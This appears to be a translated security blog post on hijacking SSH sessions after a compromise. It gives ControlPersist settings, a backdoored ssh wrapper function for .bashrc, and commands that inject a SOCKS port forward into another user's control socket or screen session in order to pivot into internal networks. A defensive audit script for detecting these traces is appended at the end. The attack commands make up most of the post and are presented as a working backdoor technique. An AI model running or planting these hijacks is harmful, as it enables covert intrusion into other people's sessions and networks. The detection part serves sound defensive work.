Hijack SSH session injection port forwarding

Source: Internet
Author: User

0x00 Preface

Yesterday a link shared in a group of very capable people turned out to describe a technique that is well suited for leaving a backdoor. It belongs to the post-exploitation stage. I had never used this method before; I had been stuck using ld_preload backdoors. Having tested it in a real environment and found that it works and is of real practical value, let's take a look at the details.

0x01 Details

1.1 Scenario 1:

The attack flow is as follows: the SSH client (ssh_user) connects to ipv_1, and the attacker already controls the ssh_user machine. By injecting port forwarding into that SSH session, the attacker can reach the networks behind ipv_1 and ipv_2. The procedure is as follows:

1. The attacker can modify the ssh client configuration in two ways. With root privileges, edit /etc/ssh/ssh_config directly. Without permission to modify ssh_config, wrap ssh in a shell function in .bashrc instead. The settings involved are:

ControlPath /tmp/%r@%h:%p
ControlMaster auto
ControlPersist yes

If ControlPersist is enabled, the control socket file is not deleted when the user's SSH session exits, so the session can still be hijacked afterwards.

2. When ssh_user connects to ipv_1 (192.168.56.131), a socket file is created in the /tmp directory. We reuse it to connect with:

ssh -S /tmp/root@192.168.56.131:22 %h

where %h stands for the remote host, as in the ControlPath template.

The command to inject a dynamic port forward into the existing session is:

ssh -O forward -D 8888 -S /tmp/root@192.168.56.131:22 %h

After running this command, port 8888 on the ssh_user machine acts as a SOCKS5 proxy through which the network segment behind ipv_2 can be reached.

3. As mentioned above, with ControlPersist yes the socket file is not deleted automatically. It can be removed manually with rm /tmp/root@192.168.56.131:22, or, more elegantly:

root@kali:~# ssh -O exit -S /tmp/root@192.168.56.131:22 %h

The ssh wrapper function placed in .bashrc looks like this:

ssh () {
    /usr/bin/ssh -o "ControlMaster=auto" -o "ControlPath=/tmp/%r@%h:%p" -o "ControlPersist=yes" "$@"
}

1.2 Scenario 2:

This scenario covers the case where ssh_user manages SSH sessions with screen. The steps are as follows:

1. When ssh_user runs

screen ssh root@192.168.56.131

to connect to ipv_1 (192.168.56.131), the corresponding session directory appears under /var/run/screen:

root@kali:~# ls -la /var/run/screen/
total 0
drwxrwxr-x  3 root utmp  60 Mar 16 03:37 .
drwxr-xr-x 20 root root 640 Mar  3 21:23 ..
drwx------  2 root root  60 Mar 16 04:21 S-root

Here S-root holds the screen sessions of the local root user, the one holding the remote connection. The session can be taken over with screen -r root/ or with screen -x 6851.pts-0.kali.

2. To inject port forwarding, first run script /dev/null to get around the pts/tty restriction. The commands are as follows:

root@kali:~# lsof -i TCP:8888
root@kali:~# script /dev/null
Script started, file is /dev/null
root@kali:~# screen -S 6851.pts-0.kali -p 0 -X stuff $'~C'
root@kali:~# screen -S 6851.pts-0.kali -p 0 -X stuff $'-D:8888\n\n'
root@kali:~# lsof -i TCP:8888
COMMAND  PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
ssh     6852 root    7u  IPv4  94301      0t0  TCP *:8888 (LISTEN)
ssh     6852 root    8u  IPv6  94302      0t0  TCP *:8888 (LISTEN)

The drawback of injecting into an ssh session running inside screen is that whatever you type is also displayed to the user currently attached to the session, which makes it easy to notice.
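As an added example (not code from the original article), the following shell script audits a host for the traces both scenarios leave behind: ControlMaster/ControlPath/ControlPersist directives or an ssh() wrapper in configuration files, control sockets lingering in /tmp, and an ssh client process that has acquired a listening port. The function names, the constructed LSOF_SAMPLE text and the set of files searched are assumptions for illustration.

```sh
# Added example, not from the original article: defender-side checks for the
# two hijack paths described above. LSOF_SAMPLE is constructed to mirror the
# article's output; nothing here comes from a real host.

# Scenario 1, step 1: count uncommented ssh_config/.ssh/config/rc lines that
# set ControlMaster, ControlPath or ControlPersist.
count_control_settings() {
    grep -Eiv '^[[:space:]]*#' "$1" 2>/dev/null \
      | grep -Eic '(^|[^[:alnum:]])Control(Master|Path|Persist)[[:space:]=]' \
      || true
}
# Scenario 1, .bashrc variant: is ssh shadowed by a shell function?
has_ssh_wrapper() {
    grep -Eq '^[[:space:]]*(function[[:space:]]+)?ssh[[:space:]]*\(\)' "$1"
}
# Scenario 1, steps 2-3: does a basename match the %r@%h:%p template?
is_control_socket_name() {
    printf '%s\n' "$1" | grep -Eq '^[^@/]+@[^:/]+:[0-9]+$'
}
# Sockets ControlPersist left in a directory (default /tmp): exactly what
# "ssh -S <socket> -O forward" reuses after the real user logged out.
find_control_sockets() {
    for p in "${1:-/tmp}"/*; do
        [ -S "$p" ] && is_control_socket_name "$(basename "$p")" && echo "$p"
    done
    return 0
}
# Scenario 2: an ssh client process normally owns no LISTEN socket; after an
# injected "~C" / "-D:8888" it does. Reads "lsof -i -nP" output on stdin
# and prints "pid port" for each ssh listener, deduplicated.
ssh_listen_ports() {
    awk '$1 == "ssh" && $NF == "(LISTEN)" {
             n = split($(NF-1), a, ":"); print $2, a[n]
         }' | sort -u
}
# Constructed sample mirroring the article's lsof output after injection.
LSOF_SAMPLE='COMMAND  PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
ssh     6852 root    7u  IPv4  94301      0t0  TCP *:8888 (LISTEN)
ssh     6852 root    8u  IPv6  94302      0t0  TCP *:8888 (LISTEN)'
# Run every check against the local host; prints one finding per line.
audit_ssh_host() {
    for f in /etc/ssh/ssh_config "$HOME/.ssh/config" "$HOME/.bashrc"; do
        [ -r "$f" ] || continue
        echo "$f: $(count_control_settings "$f") control-socket line(s)"
        has_ssh_wrapper "$f" && echo "$f: ssh() wrapper function defined"
    done
    find_control_sockets /tmp | sed 's/^/lingering control socket: /'
    lsof -i -nP 2>/dev/null | ssh_listen_ports | sed 's/^/ssh LISTEN (pid port): /'
    return 0
}
```

Run audit_ssh_host on the ssh_user machine; a ControlMaster block nobody configured, an ssh() function in .bashrc, or an ssh process listening on a port are the signals worth investigating.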
